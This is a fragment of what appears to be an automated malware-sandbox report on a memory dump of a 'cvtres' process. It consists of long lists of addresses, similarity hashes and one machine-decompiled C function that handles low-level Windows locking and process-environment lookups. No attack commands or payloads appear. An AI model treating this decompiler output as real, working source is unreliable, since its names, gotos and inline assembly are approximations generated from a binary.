                                                                        0x055c45a3
                                                                        0x055c4599
                                                                        0x055c458c
                                                                        0x055c4582
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c41f4
                                                                        0x055c423e
                                                                        0x055c4241
                                                                        0x055c45c0
                                                                        0x055c45c4
                                                                        0x00000000
                                                                        0x055c45ca
                                                                        0x055c45ca
                                                                        0x00000000
                                                                        0x0560e207
                                                                        0x0560e20f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c45d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055c45ca
                                                                        0x00000000
                                                                        0x055c4247
                                                                        0x055c4247
                                                                        0x055c4247
                                                                        0x055c4249
                                                                        0x055c4249
                                                                        0x055c4249
                                                                        0x055c4251
                                                                        0x055c4251
                                                                        0x055c4257
                                                                        0x055c425f
                                                                        0x055c426e
                                                                        0x055c4270
                                                                        0x055c427a
                                                                        0x0560e219
                                                                        0x0560e219
                                                                        0x055c4280
                                                                        0x055c4282
                                                                        0x055c4456
                                                                        0x055c45ea
                                                                        0x00000000
                                                                        0x055c45f0
                                                                        0x0560e223
                                                                        0x00000000
                                                                        0x0560e223
                                                                        0x055c445c
                                                                        0x055c445c
                                                                        0x00000000
                                                                        0x055c445c
                                                                        0x00000000
                                                                        0x055c4288
                                                                        0x055c428c
                                                                        0x0560e298
                                                                        0x055c4292
                                                                        0x055c4292
                                                                        0x055c429e
                                                                        0x055c42a3
                                                                        0x055c42a7
                                                                        0x055c42ac
                                                                        0x0560e22d
                                                                        0x055c42b2
                                                                        0x055c42b2
                                                                        0x055c42b9
                                                                        0x055c42bc
                                                                        0x055c42c2
                                                                        0x055c42ca
                                                                        0x055c42cd
                                                                        0x055c42cd
                                                                        0x055c42d4
                                                                        0x055c433f
                                                                        0x055c433f
                                                                        0x055c42d6
                                                                        0x055c42d6
                                                                        0x055c42d9
                                                                        0x055c42dd
                                                                        0x055c42eb
                                                                        0x0560e23a
                                                                        0x055c42f1
                                                                        0x055c4305
                                                                        0x055c430d
                                                                        0x055c4315
                                                                        0x055c4318
                                                                        0x055c431f
                                                                        0x055c4322
                                                                        0x055c432e
                                                                        0x055c433b
                                                                        0x055c433b
                                                                        0x00000000
                                                                        0x055c432e
                                                                        0x055c42eb
                                                                        0x055c434c
                                                                        0x055c434e
                                                                        0x055c4352
                                                                        0x055c4359
                                                                        0x055c435e
                                                                        0x055c4361
                                                                        0x055c436e
                                                                        0x055c438a
                                                                        0x055c438e
                                                                        0x055c4396
                                                                        0x055c439e
                                                                        0x055c43a1
                                                                        0x055c43ad
                                                                        0x055c43bb
                                                                        0x055c43bb
                                                                        0x055c43ad
                                                                        0x055c436e
                                                                        0x055c43bf
                                                                        0x055c43c5
                                                                        0x055c4463
                                                                        0x055c4463
                                                                        0x055c43ce
                                                                        0x055c43d5
                                                                        0x055c43d9
                                                                        0x055c43df
                                                                        0x055c4475
                                                                        0x055c4479
                                                                        0x055c4491
                                                                        0x055c4491
                                                                        0x055c4479
                                                                        0x055c43e5
                                                                        0x055c43eb
                                                                        0x055c43f4
                                                                        0x055c43f6
                                                                        0x055c43f9
                                                                        0x055c43fc
                                                                        0x055c43ff
                                                                        0x055c44e8
                                                                        0x055c44ed
                                                                        0x055c44f3
                                                                        0x0560e247
                                                                        0x00000000
                                                                        0x055c44f9
                                                                        0x055c4504
                                                                        0x055c4508
                                                                        0x055c450f
                                                                        0x0560e269
                                                                        0x00000000
                                                                        0x055c4515
                                                                        0x055c4519
                                                                        0x055c4531
                                                                        0x055c4534
                                                                        0x055c4537
                                                                        0x055c453e
                                                                        0x055c4541
                                                                        0x055c454a
                                                                        0x0560e255
                                                                        0x0560e255
                                                                        0x0560e25b
                                                                        0x0560e25e
                                                                        0x0560e261
                                                                        0x0560e261
                                                                        0x055c4555
                                                                        0x055c4559
                                                                        0x055c455d
                                                                        0x0560e26d
                                                                        0x0560e270
                                                                        0x0560e274
                                                                        0x0560e27a
                                                                        0x0560e27d
                                                                        0x0560e28e
                                                                        0x0560e28e
                                                                        0x055c4563
                                                                        0x055c4563
                                                                        0x055c4569
                                                                        0x055c4569
                                                                        0x00000000
                                                                        0x055c455d
                                                                        0x055c450f
                                                                        0x00000000
                                                                        0x055c44f3
                                                                        0x055c43ff
                                                                        0x055c4405
                                                                        0x055c4405
                                                                        0x055c4405
                                                                        0x055c42ac
                                                                        0x055c428c
                                                                        0x055c4282
                                                                        0x055c4407
                                                                        0x055c440d
                                                                        0x0560e2af
                                                                        0x0560e2af
                                                                        0x055c4413
                                                                        0x055c4413
                                                                        0x00000000
                                                                        0x055c41d4
                                                                        0x00000000
                                                                        0x055c41c3
                                                                        0x055c41bd
                                                                        0x055c4415
                                                                        0x055c4415
                                                                        0x055c4416
                                                                        0x055c4417
                                                                        0x055c4429
                                                                        0x055c416e
                                                                        0x055c416e
                                                                        0x055c4175
                                                                        0x055c4498
                                                                        0x055c449f
                                                                        0x0560e12d
                                                                        0x00000000
                                                                        0x0560e133
                                                                        0x00000000
                                                                        0x0560e133
                                                                        0x055c44a5
                                                                        0x055c44a5
                                                                        0x055c44aa
                                                                        0x00000000
                                                                        0x055c44bb
                                                                        0x055c44ca
                                                                        0x055c44d6
                                                                        0x055c44d7
                                                                        0x055c44d8
                                                                        0x055c44e3
                                                                        0x055c44e3
                                                                        0x055c44aa
                                                                        0x055c417b
                                                                        0x055c417b
                                                                        0x055c417b
                                                                        0x00000000
                                                                        0x055c417b
                                                                        0x055c4175
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e21e032f47c43f9e83ceaaaf503589e0759dc3528a7319dae08771209ffd28e
                                                                        • Instruction ID: 161400ffbceeccc40375a48efdad48a3731d3f3441e0e45f3b4e71918b2f5d5e
                                                                        • Opcode Fuzzy Hash: 5e21e032f47c43f9e83ceaaaf503589e0759dc3528a7319dae08771209ffd28e
                                                                        • Instruction Fuzzy Hash: BAF16170608211CFCB28CF98C494A3ABBE6FF88715F1459AEF486CB290E775D985C752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E055D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x5698714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E055D2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E055D2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E055A58EC(_t240);
									_t221 =  *0x5695cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x5695cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E055E4A2C(0x5696e40, 0x55e4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E055C7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x5585c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E055DF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E055DF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E05627016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L055C2400(_t267 + 0x20);
															}
															L055C2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E055D2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E055C2280(_t134, 0x5698608);
									__eflags =  *0x5696e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E055BFFB0(_t198, _t241, 0x5698608);
										__eflags = _t253;
										if(_t253 != 0) {
											L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x5696e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x5698608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E055D6B90(_t210,  &_v64);
										_t262 =  *0x5698608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E055DE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E055E97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E055E006A(0x5698608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x5698608);
												E055EB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x5696904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x5696e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E055BFFB0(_t198, _t240, 0x5698608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E055E00C2(0x5698608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                        0x055d20a0
                                                                        0x055d20a8
                                                                        0x055d20ad
                                                                        0x055d20b3
                                                                        0x055d20b8
                                                                        0x055d20c2
                                                                        0x055d20c7
                                                                        0x055d20cb
                                                                        0x055d20d2
                                                                        0x055d2263
                                                                        0x055d2266
                                                                        0x05615836
                                                                        0x05615836
                                                                        0x00000000
                                                                        0x055d226c
                                                                        0x055d226c
                                                                        0x055d2270
                                                                        0x055d2274
                                                                        0x055d20e2
                                                                        0x055d20e2
                                                                        0x055d20e6
                                                                        0x055d20ee
                                                                        0x056157dc
                                                                        0x056157de
                                                                        0x056157ec
                                                                        0x056157ec
                                                                        0x056157f1
                                                                        0x056157f3
                                                                        0x056157f8
                                                                        0x00000000
                                                                        0x056157f8
                                                                        0x056157e0
                                                                        0x056157e4
                                                                        0x056157ea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056157ea
                                                                        0x055d20f4
                                                                        0x055d20f4
                                                                        0x055d20f8
                                                                        0x055d20f8
                                                                        0x055d20fc
                                                                        0x055d2100
                                                                        0x055d2106
                                                                        0x055d2201
                                                                        0x055d2206
                                                                        0x055d220b
                                                                        0x055d220e
                                                                        0x055d22a9
                                                                        0x055d22ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d22b2
                                                                        0x055d22b5
                                                                        0x05615801
                                                                        0x05615806
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615810
                                                                        0x05615815
                                                                        0x05615818
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561581e
                                                                        0x055d22bb
                                                                        0x055d22bb
                                                                        0x055d2218
                                                                        0x055d2218
                                                                        0x055d221c
                                                                        0x055d2220
                                                                        0x055d2222
                                                                        0x055d22c2
                                                                        0x055d22c4
                                                                        0x055d22dc
                                                                        0x055d22dc
                                                                        0x055d22e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d22e7
                                                                        0x055d22c8
                                                                        0x055d22cd
                                                                        0x055d22d3
                                                                        0x055d22d6
                                                                        0x05615823
                                                                        0x05615825
                                                                        0x05615827
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561582d
                                                                        0x00000000
                                                                        0x0561582d
                                                                        0x00000000
                                                                        0x055d2228
                                                                        0x055d2228
                                                                        0x00000000
                                                                        0x055d2228
                                                                        0x055d2222
                                                                        0x055d2214
                                                                        0x055d2214
                                                                        0x00000000
                                                                        0x055d2114
                                                                        0x055d2114
                                                                        0x055d2114
                                                                        0x055d211a
                                                                        0x055d211c
                                                                        0x055d2348
                                                                        0x055d234d
                                                                        0x05615840
                                                                        0x05615845
                                                                        0x05615848
                                                                        0x0561584e
                                                                        0x0561584e
                                                                        0x05615848
                                                                        0x055d2353
                                                                        0x055d2355
                                                                        0x055d2388
                                                                        0x055d2388
                                                                        0x055d2368
                                                                        0x055d236a
                                                                        0x055d236c
                                                                        0x055d238f
                                                                        0x00000000
                                                                        0x055d236e
                                                                        0x055d236e
                                                                        0x055d218e
                                                                        0x055d218e
                                                                        0x055d2191
                                                                        0x055d2195
                                                                        0x05615a03
                                                                        0x05615a06
                                                                        0x05615a0c
                                                                        0x05615a0f
                                                                        0x05615a11
                                                                        0x05615a13
                                                                        0x05615a13
                                                                        0x05615a19
                                                                        0x05615a1f
                                                                        0x00000000
                                                                        0x055d219b
                                                                        0x055d219b
                                                                        0x055d21a0
                                                                        0x055d2282
                                                                        0x055d2284
                                                                        0x055d2284
                                                                        0x055d2284
                                                                        0x055d2284
                                                                        0x055d21a6
                                                                        0x055d21a9
                                                                        0x055d21ac
                                                                        0x055d21ae
                                                                        0x055d21b3
                                                                        0x055d228b
                                                                        0x055d2290
                                                                        0x055d2379
                                                                        0x055d2296
                                                                        0x055d2298
                                                                        0x055d2298
                                                                        0x055d2290
                                                                        0x055d21b9
                                                                        0x055d21be
                                                                        0x055d22a2
                                                                        0x055d22a2
                                                                        0x055d21c4
                                                                        0x055d21c8
                                                                        0x055d21cc
                                                                        0x055d21d0
                                                                        0x055d21d4
                                                                        0x055d21de
                                                                        0x055d21e3
                                                                        0x05615a29
                                                                        0x05615a2c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615a3b
                                                                        0x00000000
                                                                        0x055d21e9
                                                                        0x055d21e9
                                                                        0x055d21e9
                                                                        0x055d21ee
                                                                        0x055d21f1
                                                                        0x05615a45
                                                                        0x05615a4b
                                                                        0x05615a52
                                                                        0x05615a58
                                                                        0x05615a5d
                                                                        0x05615a5f
                                                                        0x05615a71
                                                                        0x05615a61
                                                                        0x05615a6a
                                                                        0x05615a6a
                                                                        0x05615a76
                                                                        0x05615a79
                                                                        0x05615a7f
                                                                        0x05615a83
                                                                        0x05615a85
                                                                        0x05615a87
                                                                        0x05615a87
                                                                        0x05615a8c
                                                                        0x05615a91
                                                                        0x05615a97
                                                                        0x05615a9f
                                                                        0x05615aa0
                                                                        0x05615aa1
                                                                        0x05615aa6
                                                                        0x05615aab
                                                                        0x05615ab1
                                                                        0x05615ab3
                                                                        0x05615ab9
                                                                        0x05615aca
                                                                        0x05615ad4
                                                                        0x05615ad4
                                                                        0x05615ade
                                                                        0x05615ade
                                                                        0x05615aab
                                                                        0x05615a79
                                                                        0x05615a52
                                                                        0x055d21f7
                                                                        0x055d21f9
                                                                        0x055d21fe
                                                                        0x055d21fe
                                                                        0x055d21e3
                                                                        0x055d2195
                                                                        0x055d236c
                                                                        0x055d2122
                                                                        0x055d2122
                                                                        0x055d2124
                                                                        0x055d2231
                                                                        0x055d2236
                                                                        0x055d2236
                                                                        0x055d2238
                                                                        0x055d2238
                                                                        0x055d2240
                                                                        0x055d2242
                                                                        0x055d2244
                                                                        0x056159fc
                                                                        0x055d218c
                                                                        0x055d218c
                                                                        0x00000000
                                                                        0x055d218c
                                                                        0x055d224a
                                                                        0x055d224f
                                                                        0x055d2256
                                                                        0x055d2304
                                                                        0x055d2309
                                                                        0x055d230f
                                                                        0x055d231e
                                                                        0x055d231e
                                                                        0x055d231e
                                                                        0x055d2320
                                                                        0x055d2325
                                                                        0x055d232a
                                                                        0x055d232c
                                                                        0x055d233e
                                                                        0x055d233e
                                                                        0x00000000
                                                                        0x055d232c
                                                                        0x055d2311
                                                                        0x055d2317
                                                                        0x055d231a
                                                                        0x055d231c
                                                                        0x055d2380
                                                                        0x055d2380
                                                                        0x055d2380
                                                                        0x055d2384
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2386
                                                                        0x00000000
                                                                        0x055d231c
                                                                        0x055d225c
                                                                        0x055d225c
                                                                        0x00000000
                                                                        0x055d225c
                                                                        0x055d212a
                                                                        0x055d2134
                                                                        0x055d2138
                                                                        0x055d213d
                                                                        0x05615858
                                                                        0x05615863
                                                                        0x05615863
                                                                        0x05615867
                                                                        0x0561586a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561586c
                                                                        0x0561586c
                                                                        0x05615871
                                                                        0x05615875
                                                                        0x05615877
                                                                        0x05615997
                                                                        0x0561599c
                                                                        0x056159a1
                                                                        0x056159a7
                                                                        0x056159a7
                                                                        0x00000000
                                                                        0x056159a7
                                                                        0x0561587d
                                                                        0x00000000
                                                                        0x0561588b
                                                                        0x0561588b
                                                                        0x05615890
                                                                        0x05615892
                                                                        0x05615894
                                                                        0x05615899
                                                                        0x0561589b
                                                                        0x056158a0
                                                                        0x056158a0
                                                                        0x056158aa
                                                                        0x056158b2
                                                                        0x056158b6
                                                                        0x056158be
                                                                        0x056158c6
                                                                        0x056158c9
                                                                        0x0561590d
                                                                        0x05615917
                                                                        0x0561591a
                                                                        0x0561591c
                                                                        0x05615920
                                                                        0x05615928
                                                                        0x0561592a
                                                                        0x0561592c
                                                                        0x0561592e
                                                                        0x0561592e
                                                                        0x056158cb
                                                                        0x056158cd
                                                                        0x056158d8
                                                                        0x056158e0
                                                                        0x056158f4
                                                                        0x056158fe
                                                                        0x056158fe
                                                                        0x0561593a
                                                                        0x0561593e
                                                                        0x05615940
                                                                        0x05615942
                                                                        0x00000000
                                                                        0x05615944
                                                                        0x05615944
                                                                        0x05615949
                                                                        0x0561594e
                                                                        0x0561594e
                                                                        0x05615953
                                                                        0x0561595b
                                                                        0x05615976
                                                                        0x05615976
                                                                        0x0561597a
                                                                        0x0561597f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615981
                                                                        0x05615981
                                                                        0x05615981
                                                                        0x05615983
                                                                        0x05615988
                                                                        0x0561598d
                                                                        0x05615991
                                                                        0x05615991
                                                                        0x00000000
                                                                        0x0561595d
                                                                        0x0561595d
                                                                        0x05615963
                                                                        0x05615965
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615967
                                                                        0x05615967
                                                                        0x0561596b
                                                                        0x0561596d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561596f
                                                                        0x05615971
                                                                        0x05615971
                                                                        0x05615974
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615974
                                                                        0x00000000
                                                                        0x05615967
                                                                        0x0561595b
                                                                        0x05615942
                                                                        0x05615863
                                                                        0x055d2143
                                                                        0x055d2143
                                                                        0x055d2149
                                                                        0x055d214f
                                                                        0x055d22f1
                                                                        0x055d22f6
                                                                        0x00000000
                                                                        0x055d2173
                                                                        0x055d2173
                                                                        0x055d217d
                                                                        0x055d2181
                                                                        0x055d2186
                                                                        0x056159ae
                                                                        0x056159b2
                                                                        0x056159b5
                                                                        0x056159b7
                                                                        0x056159ba
                                                                        0x056159cd
                                                                        0x056159d1
                                                                        0x056159d5
                                                                        0x056159d9
                                                                        0x056159db
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056159dd
                                                                        0x056159dd
                                                                        0x056159e1
                                                                        0x056159e4
                                                                        0x056159e7
                                                                        0x056159ee
                                                                        0x056159ee
                                                                        0x056159f3
                                                                        0x056159f3
                                                                        0x00000000
                                                                        0x055d2186
                                                                        0x055d214f
                                                                        0x055d2106
                                                                        0x055d2266
                                                                        0x055d20d8
                                                                        0x055d20da
                                                                        0x055d20e0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b1d0753783f1cde0834f54eb3c7ad959cf6cbb389d980569ff0a7ab96fcdf083
                                                                        • Instruction ID: 5d9021bd45f9e0090ba70957345e8a74ffb5db2134a180f8d116486a60b83b61
                                                                        • Opcode Fuzzy Hash: b1d0753783f1cde0834f54eb3c7ad959cf6cbb389d980569ff0a7ab96fcdf083
                                                                        • Instruction Fuzzy Hash: 8EF1B0366083419FDB35CE68C444B7AFBE6BBD5324F08891DE8969B780D734D841CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

